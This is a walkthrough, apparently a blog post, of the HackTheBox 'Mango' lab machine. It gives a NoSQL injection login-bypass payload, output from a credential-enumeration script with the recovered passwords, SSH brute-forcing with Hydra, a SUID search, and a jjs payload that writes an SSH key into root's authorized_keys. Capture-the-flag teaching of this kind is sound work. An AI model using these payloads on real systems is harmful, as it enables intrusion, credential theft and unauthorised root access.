Hack The Box

HackTheBox “Mango” Walkthrough

Mango, a medium-level Linux OS machine on HackTheBox, centers around the exploitation of a NoSQL document database to circumvent an authorization page and subsequently expose database-related details. Upon obtaining…

Mango, a medium-level Linux OS machine on HackTheBox, centers around the exploitation of a NoSQL document database to circumvent an authorization page and subsequently expose database-related details. Upon obtaining user credentials from the database using a username/password enumeration script, the leverage of password reuse came into play, facilitating SSH access as one of the users and further elevating privileges through ‘su’ command usage. This progression led to the utilization of a SUID binary linked with Java, known as ‘jjs’. The attainment of a root shell was accomplished by the insertion of a public SSH key into the authorized keys file of the root user.

HackTheBox “Mango” Walkthrough, figure 1

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to full scan for open ports and services:

HackTheBox “Mango” Walkthrough, figure 2

Since we didnt get anything from visiting the target at ports 80/443, and as noticed from the resutls of the nmap scan above, we needed to edit our /etc/hosts file to include 10.10.10.162 mango.htb staging-order.mango.htb.

Let’s take a look at staging-order.mango.htb.

HackTheBox “Mango” Walkthrough, figure 3

Run Burp Suite app and employ the credentials “test:test.” Proceed to capture the corresponding request.

HackTheBox “Mango” Walkthrough, figure 4

After experimenting with various default credentials and basic SQL injections, I proceeded to explore some NoSQL injections. I found a comprehensive collection of test injections in PayloadsAllTheThings. To initiate my exploration, I tried the payload below in the login parameters of the Burp’s request.

username[$ne]=toto&password[$ne]=toto

HackTheBox “Mango” Walkthrough, figure 5

Upon clicking the forward button, the website redirects us to the /home.php page.

HackTheBox “Mango” Walkthrough, figure 6

We identified a vulnerability within the site that its is susceptible to NoSQL Injection, which enabled us to pass the authentication system. As a result of this, we will use this python script that can be employed to enumerate the database for potential credentials.

Starting with potential usernames enumeration:

└─$ python2 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username Warning: No method given. Using POST as the method. (You can give the method with -m)<...omitted...>                                                                                                                                                                                                                                                                                                                                                                                         Pattern found that starts with 'a'                                                                                  Pattern found: ad                                                                                                   Pattern found: adm                                                                                                  Pattern found: admi                                                                                                 Pattern found: admin                                                                                                username found: admin                                                                                               <...omitted...>                                                                                                                                                                                                                                                                                                                                                                                          Pattern found that starts with 'm'                                                                                  Pattern found: ma                                                                                                   Pattern found: man                                                                                                  Pattern found: mang                                                                                                 Pattern found: mango                                                                                                username found: mango

Potential passwords enumeration:

└─$ python2 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password                 Warning: No method given. Using POST as the method. (You can give the method with -m)<...omitted...>                                                                                                                                                Pattern found that starts with 'h'                                                                                                                                        Pattern found: h3                                                                                                                                                         Pattern found: h3m                                                                                                                                                        Pattern found: h3mX                                                                                                                                                       Pattern found: h3mXK                                                                                                                                                      Pattern found: h3mXK8                                                                                                                                                     Pattern found: h3mXK8R                                                                                                                                                    Pattern found: h3mXK8Rh                                                                                                                                                   Pattern found: h3mXK8RhU                                                                                                                                                  Pattern found: h3mXK8RhU~                                                                                                                                                 Pattern found: h3mXK8RhU~f                                                                                                                                                Pattern found: h3mXK8RhU~f{                                                                                                                                               Pattern found: h3mXK8RhU~f{]                                                                                                                                              Pattern found: h3mXK8RhU~f{]f                                                                                                                                             Pattern found: h3mXK8RhU~f{]f5                                                                                                                                            Pattern found: h3mXK8RhU~f{]f5H                                                                                                                                           password found: h3mXK8RhU~f{]f5H                                                                                                                                          <...omitted...>                                                                                                                                                                                                                                                                                                Pattern found that starts with 't'                                                                                                                                        Pattern found: t9                                                                                                                                                         Pattern found: t9K                                                                                                                                                        Pattern found: t9Kc                                                                                                                                                       Pattern found: t9KcS                                                                                                                                                      Pattern found: t9KcS3                                                                                                                                                     Pattern found: t9KcS3>                                                                                                                                                    Pattern found: t9KcS3>!                                                                                                                                                   Pattern found: t9KcS3>!0                                                                                                                                                  Pattern found: t9KcS3>!0B                                                                                                                                                 Pattern found: t9KcS3>!0B#                                                                                                                                                Pattern found: t9KcS3>!0B#2                                                                                                                                               password found: t9KcS3>!0B#2

Exploitation:

Collecting the findings in separate txt files.

HackTheBox “Mango” Walkthrough, figure 7

Now, we use Hydra to brute force target’s SSH service.

HackTheBox “Mango” Walkthrough, figure 8

We ssh into the target using mongo:h3mXK8RhU~f{]f5H .

HackTheBox “Mango” Walkthrough, figure 9

Privilege Escalation:

We will list the setuid permission of the target’s files using the command below:

find / -perm -4000 -exec ls -l {} + 2>/dev/null

HackTheBox “Mango” Walkthrough, figure 10

After going through the findings, we can see that jjs has a GTFOBins entry. But we will need to switch to admin username using the admin’s password t9KcS3>!0B#2 to be able to exploit jjs as it has an admin gid.

HackTheBox “Mango” Walkthrough, figure 11

To exploit jjs, we will use file write option starting with creating the payload to wirte a generated id_rsa public key into the SSH autorized_keys of the target machine.

export EXPLOIT='var FileWriter = Java.type("java.io.FileWriter");var fw=new FileWriter("/root/.ssh/authorized_keys");fw.write("your id_rsa.pub");fw.close();'

Here, we will use the id_rsa public key of our attack box. Let’s make sure generate the public/private keys for our attack box to make sure that they are there.

HackTheBox “Mango” Walkthrough, figure 12

Prepare the payload.

echo 'var FileWriter = Java.type("java.io.FileWriter");var fw=new FileWriter("/root/.ssh/authorized_keys");fw.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCPE4hkk0VejNY/nN+EbCrHCbRvRIs8etPCvN7oTh6qStYjTF5FR3t4mmDDlBKtirA67UWG5m/Ism2UD3SYm46E0HoSJfzI9AfKav4v18aXXfjSgCZzO48ssgeZm00zqJDkedu9XpH+xmzz3GxSEINPIIoXpBDNo2NI3L2SJJ/Q5sxAE2lP9tjAvDBPgUv/Jh7jUYd6OwkZQdy4J+ceCVZ5r4ew/cVnLcJLTWlkxJA8T8EGC3K4oX8k67eNXrdJEoXH2h1B/4qaSJ/kOCHUNI2GGH+ZswC+rkY93XizV5GLhBnTosgBEWMopkIiyR0PujYf5XQFIHcxyf9eVZI4n+yt91VXrbLmAG1DuIPqAocZIHzFxL4cg+aji9bGIgirAhTUtmsGSLVItPlzQJpS0+8uzSQNtypKE1ybAd3xLAdlawEimmn2mv/qYYW76F3gaeVnBid7Sj3Mo9pYL4SW71pgqV3Vv/ILG2hEp/riUycLDtaeD4kHcBhpJwmrR2ITmok= kali@kali");fw.close();' | jjs

Put the payload in a bash file inside /tmp folder of the target machine and run.

HackTheBox “Mango” Walkthrough, figure 13

We can now ssh into the target with root profile using our private key since our public key has been written into the target.

HackTheBox “Mango” Walkthrough, figure 14

Cheers.